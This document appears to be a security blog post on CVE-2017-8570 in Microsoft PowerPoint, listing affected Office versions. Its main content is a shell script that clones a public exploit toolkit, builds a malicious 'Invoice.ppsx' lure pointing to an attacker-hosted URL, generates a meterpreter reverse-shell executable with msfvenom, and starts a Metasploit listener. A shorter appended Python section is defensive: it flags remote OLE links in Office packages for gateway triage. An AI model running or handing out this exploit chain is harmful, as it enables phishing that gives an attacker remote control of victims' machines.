CVE-2017-8570 Automation

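CVE-2017-8570 is a vulnerability affecting PowerPoint presentations. It is simple to exploit and the impact is severe. An attacker only needs to send the generated malicious ppsx document (ppsx is the slideshow save format used since Office 2007) to a user; once the user opens it and the slideshow runs, they are compromised.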

    Affected versions

    Scope of impact:

    Microsoft Office 2007 Service Pack 3
    Microsoft Office 2010 Service Pack 2 (32-bit editions)
    Microsoft Office 2010 Service Pack 2 (64-bit editions)
    Microsoft Office 2013 RT Service Pack 1
    Microsoft Office 2013 Service Pack 1 (32-bit editions)
    Microsoft Office 2013 Service Pack 1 (64-bit editions)
    Microsoft Office 2016 (32-bit edition)
    Microsoft Office 2016 (64-bit edition)
    

    Automation script

    # Lab settings: listener address, listener port, working directory
    attack_ip="192.168.1.212"
    LPORT="6666"
    DIR="/var/cve2017"

    # Start from an empty working directory
    if [ -d "${DIR}" ]; then
        rm -rf "${DIR}"
        mkdir "${DIR}"
    else
        mkdir "${DIR}"
    fi
    cd "${DIR}"
    git clone https://github.com/tezukanice/Office8570.git
    cd Office8570
    # The toolkit expects template.ppsx under template/
    mkdir template
    mv template.ppsx template/template.ppsx
    python cve-2017-8570_toolkit.py -M gen -w Invoice.ppsx -u "http://${attack_ip}/logo.doc"
    msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST="${attack_ip}" LPORT="${LPORT}" -f exe > "${DIR}/shell.exe"

    # Run the toolkit in exp mode in a separate terminal
    gnome-terminal -e "python cve-2017-8570_toolkit.py -M exp -e http://${attack_ip}/shell.exe -l ${DIR}/shell.exe"

    service postgresql start
    # Rebuild the Metasploit resource file from scratch
    if [ -f "exp.rc" ]; then
        rm "exp.rc"
    fi
    echo "use exploit/multi/handler" >> exp.rc
    echo "set LHOST ${attack_ip}" >> exp.rc
    echo "set LPORT ${LPORT}" >> exp.rc
    echo "set PAYLOAD windows/x64/meterpreter/reverse_tcp" >> exp.rc
    echo "exploit" >> exp.rc
    gnome-terminal -e "msfconsole -r exp.rc"
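
The generator step above is given a remote URL (`-u`) for the ppsx to reference. For triage at a mail or file gateway, the sketch below lists external relationships in an OOXML package and keeps only remote OLE object links. It is an added example, not code from the original post or the toolkit. It assumes the reference is stored as an external relationship; the function names and sample packages are constructed for illustration.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

REL_TAG = "{http://schemas.openxmlformats.org/package/2006/relationships}Relationship"
MAX_PART = 1 << 20  # skip .rels parts over 1 MiB (zip-bomb guard)

def external_relationships(data: bytes):
    """List (part, type, target) for every TargetMode="External" relationship."""
    found = []
    with zipfile.ZipFile(io.BytesIO(data)) as pkg:
        for info in pkg.infolist():
            if not info.filename.endswith(".rels") or info.file_size > MAX_PART:
                continue
            root = ET.fromstring(pkg.read(info))
            for rel in root.iter(REL_TAG):
                if rel.get("TargetMode", "").lower() == "external":
                    kind = rel.get("Type", "").rsplit("/", 1)[-1]
                    found.append((info.filename, kind, rel.get("Target", "")))
    return found

def remote_ole_objects(data: bytes):
    """Keep only external OLE object links; ordinary hyperlinks are ignored."""
    return [f for f in external_relationships(data) if f[1] == "oleObject"]

def make_sample(kind: str, target: str) -> bytes:
    """Constructed test package containing a single slide relationship part."""
    base = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"
    rels = ('<?xml version="1.0" encoding="UTF-8"?>'
            '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
            f'<Relationship Id="rId1" Type="{base}{kind}" Target="{target}" TargetMode="External"/>'
            '</Relationships>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("ppt/slides/_rels/slide1.xml.rels", rels)
    return buf.getvalue()

if __name__ == "__main__":
    # Constructed samples: a benign hyperlink and a remote OLE link (TEST-NET address)
    for label, blob in [("hyperlink", make_sample("hyperlink", "https://example.com/")),
                        ("oleObject", make_sample("oleObject", "http://192.0.2.10/logo.doc"))]:
        print(label, remote_ole_objects(blob))
```

A hit is a reason to quarantine and inspect the file, not proof of exploitation; legitimate linked objects also appear as external relationships.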
    

    References

    1. https://github.com/tezukanice/Office8570
    2. https://xz.aliyun.com/t/3772
    3. https://github.com/Drac0nids/CVE-2017-8570